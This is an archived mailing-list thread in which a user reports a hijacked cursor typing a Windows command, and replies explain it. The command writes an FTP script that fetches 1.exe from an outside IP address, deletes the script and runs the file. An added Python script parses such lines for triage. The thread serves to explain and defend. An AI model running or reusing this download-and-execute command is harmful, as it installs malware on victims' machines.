hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo
> get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

    open 59.31.153.120 22783
    user db database
    get 1.exe
    bye

these are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppress user autologin and verboseness and
the parameter -s:ik executes the content of the file "ik" as FTP commands.

the file ftp://db:[EMAIL PROTECTED]:22783/1.exe is being fetched, the file
"ik" is then being deleted and finally the file "1.exe" is being executed.

i suppose that 1.exe is some kind of windows trojan or virus.

cheers,
-stephan loh

On 2007.05.08 15:39, Celejar wrote:
> On Tue, 8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <[EMAIL PROTECTED]> wrote:
>
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the
> > net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik
> > &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number
> > and user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a threat? And what can be
> > done against it?
> >
> > Anybody got a clue on this?
> >
> > Tia,
> >
> > Jan Outhuis
>
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
>
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
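
The step-by-step decoding in the reply above can be automated when triaging captured command lines. The following is an added example, not part of the original thread: the function name `analyze` and the report fields are hypothetical, and the sample input is the command quoted in the thread with its line wrap rejoined.

```python
import re

# Command line as quoted in the thread (line wrap rejoined).
SAMPLE = (r"cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik "
          r"&echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)   # echo TEXT >> FILE
FTP_S_RE = re.compile(r"^ftp\b.*?\s-s:(\S+)", re.I)           # ftp ... -s:FILE


def analyze(cmdline):
    """Replay an '&'-chained cmd.exe line and report FTP download-and-run behaviour.
    Simplification (assumption): '&' is treated as a plain separator, quoting is ignored."""
    files = {}          # script file name -> lines echoed into it
    report = {"script": None, "host": None, "port": None, "user": None,
              "fetched": [], "executed": [], "script_deleted": False}
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    for step in (s.strip() for s in body.split("&") if s.strip()):
        m = ECHO_RE.match(step)
        if m:                                   # line appended to a would-be script file
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_S_RE.match(step)
        if m:                                   # ftp client driven by that script file
            report["script"] = m.group(1).lower()
            for line in files.get(report["script"], []):
                parts = line.split()
                verb = parts[0].lower() if parts else ""
                if verb == "open" and len(parts) >= 2:
                    report["host"] = parts[1]
                    report["port"] = int(parts[2]) if len(parts) > 2 else 21
                elif verb == "user" and len(parts) >= 2:
                    report["user"] = parts[1]
                elif verb in ("get", "recv") and len(parts) >= 2:
                    report["fetched"].append(parts[-1].lower())
            continue
        first = step.split()[0].lower()
        if first in ("del", "erase") and report["script"] in step.lower().split()[1:]:
            report["script_deleted"] = True     # cleanup of the script file
        elif first in report["fetched"]:
            report["executed"].append(first)    # downloaded file is run afterwards
    report["suspicious"] = bool(report["script"] and report["executed"])
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```
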